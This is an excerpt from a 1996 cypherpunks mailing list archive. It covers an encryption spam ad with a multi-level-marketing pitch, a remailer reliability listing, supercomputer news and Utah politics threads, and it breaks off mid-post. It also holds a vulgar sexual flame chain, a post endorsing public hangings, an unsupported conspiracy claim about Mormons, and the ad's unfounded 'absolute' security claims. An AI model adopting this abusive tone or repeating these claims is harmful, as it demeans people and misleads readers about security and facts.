UnLimited XComm: Replay may or may not approve of the content of this posting XComm: Report misuse of this automated service to Sender: firewalls-owner at GreatCircle.COM Precedence: bulk I apologize for this intrusion into your affairs. Please forgive but we do have important information that will be of interest to Internet users. Would you like to secure your hard disk files against compromise by Internet Interlopers? Would you like to communicate over Internet in absolute privacy? We can provide you with the tools necessary to do those two things in an absolute sense. Briefly, we have developed the first software sourced OTP, which is provably as good as any hardware sourced OTP that can possibly be be generated. Most experts thought that this could not be done, but we have done it, and can prove it. Our prices are: - $95.00 for a complete dual user system, the full package for two users, but your communications are limited to that single user - - $95.00 for a complete Elita unlimited usage system - that is you can protect your internal files, and communicate with anyone else that has an Elita system, or more comprehensive Ultima system below. - $195.00 for a complete Ultima Internet/intranets system, this allows user to protect their own files - communicate with anyone that has an Ultima, or an Elita, system - to form hierarchal work groups that provide the same protection - and to customize their system variables to achieve the maximum entropy. We are also going to open up the whole company for outside participation - it is going to a completely open Internet Distributive Company, we believe the first one of its kind. Anyone is welcome to participate in the venture. All marketing is to be done on an lucrative MLM basis, program development will be done on a royalty/commission on adjusted gross income basis. Everyone that participates will share in the rewards. System testing will also be handle in a similar manner, and system engineering will be handled on a fee for services and participation basis. If you can perform, you can win big, really big. If you just try to perform, you will still win. This is an important opportunity for you, take advantage of it at this most opportune time, To order, call us at 817-691- 1081, or write to us at 2629 Plaza Parkway, Suite B-20, Wichita Falls, Texas, or order through Internet or e-mail us at: ipgsales at netprivacy.com. For more details, visit our web site at: http://www.netprivacy.com Our apologies again, but we believe it to be important. Appreciatively, Don Wood, IPG "None can be so true to your secret as yourself." - Sa'Di ----- End of forwarded message from Anonymous ----- -- "It is seldom that liberty of any kind is lost all at once." -Hume From ses at tipper.oit.unc.edu Mon Sep 30 08:34:44 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Mon, 30 Sep 1996 23:34:44 +0800 Subject: An ITAR moment Message-ID: I'm currently sitting in a computer lab at the ICM in Warsaw, at a workshop on caching in the web. I wanted to log back home to check my email, so I asked if they had telnet or something. "Actually, we're disabling rlogin and telnet on our machines - can you use ssh?". Simon --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From trei at process.com Mon Sep 30 09:58:04 1996 From: trei at process.com (Peter Trei) Date: Tue, 1 Oct 1996 00:58:04 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) Message-ID: <199609301325.GAA13466@toad.com> > On Sun, 29 Sep 1996 12:16:27 -0800, Timothy C. May wrote: > > >Symmetric multiprocessing is available, but it's often much less hassle to > >have a single CPU running at 200 MHz than to try games with multiple > >processors (which means more PCB real estate, more sockets, more of other > >things). > > As far as SMP goes, it's actually not all that expensive. People in the > linux-smp list have reported differences of as little as $50 for a > uniprocessor vs. dual pentium system. Of course, every so often we'll get a > message about a $30,000 system that can handle up to 64 Pentium > Pros! Check out http://www.ssd.intel.com/tflop.html, where Intel is building a 9000 Pentium Pro (200 MHz) machine for Sandia. Yes, it runs Unix, and they've already delivered the first 64 processor node. When finished, it will have 600Gbyte RAM, 200Tbyte disk, and run at about 1.8 Tflops, and cover about 1600 square feet. Price? 46 M$, or about $5k/processor. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From mirele at xmission.com Mon Sep 30 10:04:43 1996 From: mirele at xmission.com (Deana Holmes) Date: Tue, 1 Oct 1996 01:04:43 +0800 Subject: Utah as a Religious Police State Message-ID: <199609301251.GAA09713@mail.xmission.com> On 29 Sep 96 at 17:36, Ryan Russell/SYBASE wrote: > Hmm...never heard that one before. Care to produce > a reference? > > (Or am I supposed to be ignoring this guy when he > makes ridiculous claims?) > > Ryan I suspect that Dmitri is referring to the Mountain Meadows Massacre. It's not a pretty story and is one of the low points of Mormon history. The late historian Juanita Brooks wrote about the masscre, and about the leader, John D. Lee, in a couple of books. > ---------- Previous Message ---------- > To: cypherpunks > cc: > From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp > Date: 09/29/96 05:54:09 PM > Subject: Re: Utah as a Religious Police State > > Ryan Russell/SYBASE writes: > > I guess that depends on your definition of liberty. The Mormons > > originally moved there to have a place to practice their religion, > > and have freedom from persecution. I suppose one could extend that > > to wanting a place to have the freedom to have a set of rules consistant > > with their beliefs. Should that include freedom from interferance from > > folks such as yourself who want to change their rules, even though > > you're not presently effected? > > It's worth noting that one of Utah mormons favorite pastimes was to ambush > the settlers heading for California, kill them all, and take their property. > However the mormons were dealt with much less severely than the local Indians > who tried the same tricks. Pity. ===end vulis rant=== Deana Deana M. Holmes April 1996 poster child for clueless $cientology litigiousness alt.religion.scientology archivist since 2/95 mirele at xmission.com From mirele at xmission.com Mon Sep 30 10:06:06 1996 From: mirele at xmission.com (Deana Holmes) Date: Tue, 1 Oct 1996 01:06:06 +0800 Subject: Utah as a Religious Police State Message-ID: <199609301250.GAA09647@mail.xmission.com> On 30 Sep 96 at 0:55, Moroni wrote: > I never cease to be surprised by the interest that gentiles show in > working mormon communities while totally neglecting their own failing > areas. I never cease to be surprised by Mormon apologists who refuse to look in the mirror at problems in so-called "working Mormon communities." I moved to Utah 2 years ago from Texas. Even though I am nominally Mormon (I haven't been to Church in years), it was still a huge culture shock to me. I think the thing that bugs me the most is the way the political system is dominated by a 500 lb. elephant known as the LDS Church. We Utahns sit in a room with this elephant that eats and s**ts and yet we don't talk about the fact that it's there. This is Utah for you...Utah where during the first legislative session I was here (1995) the legislature spent 42 out of 45 days talking about whether they were going to have tightened ethics laws. Where during the last legislative session (1996) the legislature spent 42 of 45 days discussing what to do about the fact that a few kids in one of the Salt Lake high schools wanted to have a gay/lesbian/straight club. NO MATTER that the schools are horribly overcrowded and that in some elementary grades 40-plus students per classroom is the norm. NO MATTER that teachers are horribly underpaid in a state with California-style costs. NO MATTER that despite a $100 million surplus the governor and the legislature can't see clear to get rid of the sales tax on *food*. NO MATTER that if anything terribly controversial (or even not so controversial) comes up, someone in the legislature feels like they have to sound out the Church to make sure that they don't cross Gordon B. Hinckley or Boyd K. Packer and endanger their Church membership. In the meantime, our legislators (with Church approval, these are Church "callings") run down to the prison at Point of the Mountain to "counsel" convicted child abusers and then pass laws to get rid of minimum mandatory sentencing. The roads are falling apart here, the schools are overcrowded. Gang violence is prevalent up and down the Wasatch Front. I heard about a gang-related murder in Layton last weekend. Up until a month ago, when the mayor of Salt Lake City closed the place and forced them out, there was a well-known open-air drug supermarket going on in Pioneer Park. Legislative leaders think that they're above the Open Meetings law. And liquor laws still are pretty backwards. (Gee, just last week places that sell beer actually got permission to put signs that say "BEER" instead of "BEE?" on their premises.) Thing is, Utah is generally a wonderful place to live. As I said, I used to live in Texas. It's great to live in a place where the economy is booming and there are jobs available. The crime rate is pretty low for an urban community (but there are sore spots, as I indicated above). The scenery is downright spectacular. And Salt Lake City proper is a pretty cool place. But I don't believe that Utah is immune to the problems that beset other cities. One thing that would help is for Utah opinion-makers to admit that not everyone who lives in this "pretty, great state" is a devout Mormon and/or a Republican. Not everyone shares the same values as the dominant religion, and they shouldn't have to. I apologise to the cypherpunks mailing list for this rant, but not everyone in Utah agrees with the view expressed by Moroni above. Deana Deana M. Holmes April 1996 poster child for clueless $cientology litigiousness alt.religion.scientology archivist since 2/95 mirele at xmission.com From dlv at bwalk.dm.com Mon Sep 30 10:20:36 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 1 Oct 1996 01:20:36 +0800 Subject: [SPAM] Another "petard" from Timmy "peteur" May and his young friends In-Reply-To: <199609300441.AA10704@crl12.crl.com> Message-ID: Timmy May has no life. >From: Troy Varange >Message-Id: <199609300441.AA10704 at crl12.crl.com> >Subject: Re: Vulis FUCKHEAD sucks Timmy's Cock >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >Date: Sun, 29 Sep 1996 21:41:42 -0700 (PDT) >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 11:58:09 pm >X-Mailer: ELM [version 2.4 PL23] >Mime-Version: 1.0 >Content-Type: text/plain; charset=US-ASCII >Content-Transfer-Encoding: 7bit >Content-Length: 5298 > >Vulis sucks Timmy's boyfriend's cock. >> >> Timmy May has no life. >> >> >From: Troy Varange >> >Message-Id: <199609300332.AA09870 at crl12.crl.com> >> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May >> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >> >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT) >> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm >> >X-Mailer: ELM [version 2.4 PL23] >> >Mime-Version: 1.0 >> >Content-Type: text/plain; charset=US-ASCII >> >Content-Transfer-Encoding: 7bit >> >Content-Length: 4378 >> > >> >> berserk >> >> Timmy May has gone . Has he been eating speed? >> >> bananas >> >> >> >> >From: Troy Varange >> >> >Message-Id: <199609300138.AA08482 at crl12.crl.com> >> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May >> >> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >> >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT) >> >> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm >> >> >X-Mailer: ELM [version 2.4 PL23] >> >> >Mime-Version: 1.0 >> >> >Content-Type: text/plain; charset=US-ASCII >> >> >Content-Transfer-Encoding: 7bit >> >> >Content-Length: 3442 >> >> > >> >> >> >> >> >> What has Timmy been smoking? >> >> >> >> >> >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996 >> >> >> ]Received: by bwalk.dm.com (1.65/waf) >> >> >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT >> >> >> ] for dlv >> >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; >> >> >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400 >> >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129; >> >> >> ] 29 Sep 96 15:59 BST >> >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net >> >> >> ] id aa09441; 29 Sep 96 15:54 BST >> >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP >> >> >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000 >> >> >> ]Comments: Authenticated sender is >> >> >> ]From: paul at fatmans.demon.co.uk >> >> >> ]To: "Dr.Dimitri Vulis KOTM" >> >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000 >> >> >> ]Mime-Version: 1.0 >> >> >> ]Content-Type: text/plain; charset=US-ASCII >> >> >> ]Content-Transfer-Encoding: 7BIT >> >> >> ]Subject: Re: Possible subs attack???? >> >> >> ]Priority: normal >> >> >> ]X-Pm-Encryptor: JN-PGP-P, 4 >> >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31) >> >> >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk> >> >> >> ] >> >> >> ]-----BEGIN PGP SIGNED MESSAGE----- >> >> >> ] >> >> >> ] >> >> >> ]> The lying sack of shit Timmy May writes: >> >> >> ] >> >> >> ]> The lying sack of shit Timmy May lies again, as usual. >> >> >> ] >> >> >> ]Fuck you, >> >> >> ] >> >> >> ]I am not Tim May, Check out the return path if you don`t believe me, >> >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they >> >> >> ]don`t sign keys here and there without checking ID`s... >> >> >> ] >> >> >> ]Type Bits/KeyID Date User ID >> >> >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley >> >> >> ] >> >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK----- >> >> >> ]Version: 2.6.3ia >> >> >> ] >> >> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 >> >> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 >> >> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR >> >> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy >> >> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP >> >> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b >> >> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k >> >> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ >> >> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 >> >> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 >> >> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp >> >> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW >> >> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi >> >> >> ]mUqFH41Z7NkyO8ZFdi5GGX0= >> >> >> ]=CMZA >> >> >> ]- -----END PGP PUBLIC KEY BLOCK----- >> >> >> ] >> >> >> ] >> >> >> ] >> >> >> ]-----BEGIN PGP SIGNATURE----- >> >> >> ]Version: 2.6.3ia >> >> >> ]Charset: cp850 >> >> >> ] >> >> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR >> >> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B >> >> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh >> >> >> ]2Wqa5+h8R7g= >> >> >> ]=/M2U >> >> >> ]-----END PGP SIGNATURE----- >> >> >> ] >> >> >> ] Datacomms Technologies web authoring and data security >> >> >> ] Paul Bradley, Paul at fatmans.demon.co.uk >> >> >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org >> >> >> ] Http://www.cryptography.home.ml.org/ >> >> >> ] Email for PGP public key, ID: 5BBFAEB1 >> >> >> ] "Don`t forget to mount a scratch monkey" >> >> >> >> >> >Fuckhead. >> >> >> >Fuckhead. We know your behind Vulis, Cock-sucker >> >and he swallows From gcg at pb.net Mon Sep 30 10:24:05 1996 From: gcg at pb.net (Geoffrey C. Grabow) Date: Tue, 1 Oct 1996 01:24:05 +0800 Subject: What about making re-mailers automatically chain? Message-ID: <3.0b15.32.19960930085114.0068dec0@mail.pb.net> A non-text attachment was scrubbed... Name: not available Type: text/enriched Size: 2540 bytes Desc: not available URL: From wombat at mcfeely.bsfs.org Mon Sep 30 10:48:59 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 1 Oct 1996 01:48:59 +0800 Subject: Does any body know anything about this? In-Reply-To: <199609292138.OAA27616@abraham.cs.berkeley.edu> Message-ID: On Sun, 29 Sep 1996, John Anonymous MacDonald wrote: > Is this just more snakeoil or is this real? No, it is Matt Blaze. Go and read every altavista search hit on his name as your pennance for posting this. ;) -r.w. > University of Cambridge Computer Laboratory > > EXTRA SEMINAR > > SPEAKER: Matt Blaze > AT&T Research > > DATE: Monday 23rd September 1996 at 11.30 am > > PLACE: Room TP4, Computer Laboratory > > TITLE: SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS From jya at pipeline.com Mon Sep 30 11:07:50 1996 From: jya at pipeline.com (John Young) Date: Tue, 1 Oct 1996 02:07:50 +0800 Subject: ADJ_ust Message-ID: <199609301350.NAA10824@pipe2.ny1.usa.pipeline.com> 9-30-96. NYP: "National Security Experts Plan for Wars Whose Targets and Weapons Are All Digital." Is the threat real, or is this just another way to win scarce funds? Military and intelligence officials believe that enemy nations, terrorists and criminal groups either already have the capability to mount information warfare strikes or soon will. Criminals are quickly progressing beyond the vandalism and petty theft associated with teen-aged hackers and into robbery and extortion schemes ranging up to millions of dollars, corporate executives and private investigators say. Others reply that the worst threats mentioned are mostly speculation. "Information warfare is a risk to our nation's economy and defense," said Martin Libicki, a senior fellow at the National Defense University. "But I believe we will find ways to cope with these attacks, adjust and shake them off, just as we do to natural disasters like hurricanes." ----- http://jya.com/adjust.txt (14 kb) ADJ_ust From whallen at capitalnet.com Mon Sep 30 11:18:23 1996 From: whallen at capitalnet.com (Wayne H. Allen) Date: Tue, 1 Oct 1996 02:18:23 +0800 Subject: [AP] Afghanistan Message-ID: <199609301406.KAA08044@ginger.capitalnet.com> At 05:57 PM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote: >"Wayne H. Allen" writes: > >> At 04:10 AM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote: >> >Afghanis publicly hanged their former president, Najibullah [no last name]. >> >Other countries should follow their example. >> > >> >> And this would accomplish???? And this has what to do with cryptography?? > >Nothing, of course - neither do Timmy May's stupid rants, lies, and personal >attacks. > >By the way, your abuse of your native language suggests that you're probably >a product of U.S. public education. > > And you would be far off base once again. Wayne H.Allen whallen at capitalnet.com Pgp key at www.capitalnet.com/~whallen From jya at pipeline.com Mon Sep 30 11:30:28 1996 From: jya at pipeline.com (John Young) Date: Tue, 1 Oct 1996 02:30:28 +0800 Subject: GCHQ releases Venona files (from UK Telegraph) Message-ID: <199609301407.OAA11575@pipe2.ny1.usa.pipeline.com> If anyone in the UK cares to get the GCHQ Venona releases, we'll be pleased to scan them for distribution. Or put them on our Web site. Our fax: 212-799-4003 (US) Vox: 212-873-8700 Or if someone else scans them and needs a Web site, ftp them to: ftp://jya.com/pub/incoming From crypto at nas.edu Mon Sep 30 11:37:24 1996 From: crypto at nas.edu (CRYPTO) Date: Tue, 1 Oct 1996 02:37:24 +0800 Subject: Another briefing in Atlanta on the NRC crypto report,... Message-ID: <9608308441.AA844103952@nas.edu> Subject: Another briefing in Atlanta on the NRC crypto report, October 21, 1996 Cryptography's Role in Securing the Information Society A Public Briefing in Atlanta, Georgia Monday, October 21, 1996, 1:30-3:30 pm There will be a public briefing in Atlanta, Georgia by the National Research Council on this report. The briefing will be held at the Manufacturing Research Center on the campus of the Georgia Institute of Technology on Monday October 21, from 1:30 to 3:30. Dr. Herbert Lin, director of the NRC study will conduct the briefing. Questions from the audience will be entertained. For further information, please contact Dr. Myron L. Cramer (404) 894-7292, at the Georgia Tech Research Institute. The event is open to the press and the public. Directions: From I-75/85 exit on Tenth Street and head West. Turn left on Hemphill Street and follow it to where it ends on Ferst Street. The Manufacturing Research Center is the modern building in front of you. Parking is limited; use public transportation or allow yourself extra time. If you have suggestions about other places that the committee should offer a public briefing, please send e-mail to crypto at nas.edu. From cadams at acucobol.com Mon Sep 30 11:37:47 1996 From: cadams at acucobol.com (Chris Adams) Date: Tue, 1 Oct 1996 02:37:47 +0800 Subject: Internet plug pulled on Colombia's guerrillas Message-ID: <199609301422.HAA28798@acucobol.acucobol.com> On Fri, 27 Sep 1996 14:33:42 -0800, jim bell wrote: >>The Revolutionary Armed Forces of Colombia (FARC), which >>has periodically paralyzed half the country with road blocks, >>found its route to the information superhighway barred. >> >>The Communist insurgents, who rose up in arms in 1964, >>embraced new technology last year in their fight to overthrow the >>government by launching a home page on the Internet. > >I couldn't resist smiling when I read this. Not that I want their access >cut; quite the opposite. But it is REALLY reassuring to see the authorities >behave in exactly the fashion you expect them to! Attempting to cut off >dissenting political voices IRL is de rigeur; now, this shows that they >believe "threat" to the government posed by allowing others to voice >contrary opinions on the 'net is real. It's particularly funny when you consider that the main justification for suppression is that insurgents (or rebels or freedom fighters or ...) kill people. Something along the lines of "We don't suppress unpopular views; we're just protecting our citizens". Now, it seems to me that that having a web page is a decidely non-lethal thing. OTOH, it's probably more effective at getting the outside world to find out what's happening. Draw your own conclusions. # Chris Adams # | http://www.io-online.com/adamsc/adamsc.htp From raph at CS.Berkeley.EDU Mon Sep 30 11:42:58 1996 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Tue, 1 Oct 1996 02:42:58 +0800 Subject: List of reliable remailers Message-ID: <199609301350.GAA15812@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see: http://www.c2.org/~raph/premail.html For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"ecafe"} = " cpunk mix"; $remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub"; $remailer{'alpha'} = ' alpha pgp'; $remailer{'nymrod'} = ' alpha pgp'; $remailer{"lead"} = " cpunk pgp hash latent cut ek"; $remailer{"nemesis"} = " cpunk pgp hash latent cut"; $remailer{"exon"} = " cpunk pgp hash latent cut ek"; $remailer{"vegas"} = " cpunk pgp hash latent cut"; $remailer{"haystack"} = " cpunk mix pgp hash latent cut ek"; $remailer{"ncognito"} = " mix cpunk pgp hash latent"; $remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek"; $remailer{"jam"} = " cpunk mix pgp hash latent cut ek"; $remailer{"winsock"} = " cpunk pgp hash cut ksub reord"; $remailer{'nym'} = ' newnym pgp'; $remailer{"balls"} = " cpunk pgp hash latent cut ek"; $remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek"; $remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord"; $remailer{'cyber'} = ' alpha pgp'; $remailer{"dustbin"} = " cpunk pgp hash ksub latent cut ek mix reord"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Groups of remailers sharing a machine or operator: (cyber mix) The alpha and nymrod nymservers are down due to abuse. However, you can use the cyber nymserver. The nym.alias.net server will be listed soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details. 403 Permission denied errors have been caused by a flaky disk on the Berkeley WWW server. Hopefully, this is fixed by now. The penet remailer is closed. Last update: Mon 30 Sep 96 6:45:05 PDT remailer email address history latency uptime ----------------------------------------------------------------------- jam remailer at cypherpunks.ca ************ 14:56 100.00% cyber alias at alias.cyberpass.net *****++**+** 33:36 99.96% dustbin dustman at athensnet.com ++-+-++++-- 1:11:40 99.94% winsock winsock at c2.org --------..-+ 6:56:13 99.81% exon remailer at remailer.nl.com #*+#*# -#*** 12:53 99.79% extropia remail at miron.vip.best.com ----.------ 7:25:48 99.62% balls remailer at huge.cajones.com ************ 5:03 99.40% haystack haystack at holy.cow.net #--*##*#### 13:56 99.17% amnesia amnesia at chardos.connix.com ----------+ 3:47:17 98.46% middle middleman at jpunix.com - - +- - + 1:27:49 95.92% squirrel mix at squirrel.owl.de --++++ +++ 1:56:13 92.08% replay remailer at replay.com **+****** * 4:11 91.92% lead mix at zifi.genetics.utah.edu + ++*++ .-* 2:49:27 91.01% mix mixmaster at remail.obscura.com ++++-++--+ 1:53:37 81.18% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From thad at hammerhead.com Mon Sep 30 11:52:43 1996 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Tue, 1 Oct 1996 02:52:43 +0800 Subject: Looking for Qualified Individual/Firm to Contract for Cryptanalysis Message-ID: <199609301400.HAA15466@hammerhead.com> I saw this > > I am looking for one or more people (or firms) who are qualified to perform > > world class cryptanalysis work. Please send mail to me at joswald1 at msn.com > > call in the U.S. at +1 408.479.7874 > > > > Jack Oswald and then this... > [from alt.religion.scientology, where net-activist Grady Ward is a subject > of a lawsuit from the Scientologists...] > > Grady Ward posted updates in his case of alleged copyright and trade > secret violation. > > "Word as of September 26, 1996 at 10:00 AM is that the technician who has > been trying to 'crack' files apparently encrypted using PGP has admitted > that 'he can make no further progress' after a month of concentrated > effort. > > "The disks will remain in a safety deposit box until the 'ho reveals any > new plans for bringing in cryptography experts to assist in the analysis." [the 'ho here is a nasty name for the religions key lawyer, Helena Kobrin] The trial is happening in San Jose, and I wouldn't be at all surprised if the attempted cryptanalysis is happening there, too. They've been working at it for a few months now. thad -- Thaddeus Beier thad at hammerhead.com Visual Effects Supervisor 408) 286-3376 Hammerhead Productions http://www.got.net/people/thad From dthorn at gte.net Mon Sep 30 12:11:07 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 1 Oct 1996 03:11:07 +0800 Subject: Utah as a Religious Police State [RANT] In-Reply-To: Message-ID: <324FD588.3FF2@gte.net> On the below: Gentiles (and Jews) are *very* afraid of Mormons. Maybe it has something to do with the World's Largest Database (on non-Mormons especially) they keep under that mountain near SLC Utah. Moroni wrote: > I never cease to be surprised by the interest that gentiles show in > working mormon communities while totally neglecting their own failing > areas. > On Sun, 29 Sep 1996, Timothy C. May wrote: > > (I received this message, with "cypherpunks at sybase.com" as well as > > "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for > > the Cypherpunks list, with some sybase domain name weirdness, or reflector, > > going on.) > > At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote: > > >I guess that depends on your definition of liberty. The Mormons > > >originally moved there to have a place to practice their religion, > > >and have freedom from persecution. I suppose one could extend that > > >to wanting a place to have the freedom to have a set of rules consistant > > >with their beliefs. Should that include freedom from interferance from > > >folks such as yourself who want to change their rules, even though > > >you're not presently effected? > > > > Well, if Utah can rig a way to _secede_ from the Union, your arguments > > would make more sense. But so long as they are part of these United States, > > their religious beliefs about when children should be at home cannot > > supersede basic liberties. [additional text deleted] From rah at shipwright.com Mon Sep 30 12:14:06 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 03:14:06 +0800 Subject: the theory of split currency Message-ID: Austrian-econ is an academic economists' list focused on so-called "austrian" economics, like Hayek, Von Mises, etc... Notice the last little bit about Patrick Leahy... Cheers, Bob Hettinga --- begin forwarded text Date: Sat, 28 Sep 1996 20:13:48 -0700 (PDT) From: Fred Foldvary To: Austrian Economics Subject: the theory of split currency Organization: JFK University Mime-Version: 1.0 Sender: owner-austrianecon at agoric.com Precedence: bulk Reply-To: AustrianECON at agoric.com Is there a name for a dual or split currency, in which there is one currency for domestic use and another, different appearing, currency for foreign usage? Does anyone know of any country which has had such a split currency? Is there any literature on such split currency? Here some thoughts on how it could function in the U.S.: 1) Domestic currency would not be legal tender outside the U.S. 2) Foreign US dollars would not be legal tender in the U.S. It would be illegal to hold foreign dollars in the U.S. Travelers would be required to convert them at customs. 3) The export of domestic currency would be illegal. 4) All exchanges between domestic and foreign currency would be required to be made in official exchanges, with the amounts recorded and reported to the government. 5) All previous currency would be declared of no value after a certain date. All conversions to new currency would be reported. What would be the implications for banking, international trade, and the market process? Would it affect the measurement of the money supply, and monetary policy? A motive for the government would be to control the underground economy, tax evasion, and the trade in illegal substances. This scenario is not entirely hypothetical. I have read that Senator Patrick Leahy introduced Senate Bill #307 to create such a split currency. The Bill failed to pass the Senate, but this shows the concept is out there. Is this worth investigation and theoretical examination? Fred Foldvary --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From rah at shipwright.com Mon Sep 30 12:30:10 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 03:30:10 +0800 Subject: Workers, Public Schools, Tradesmen, and 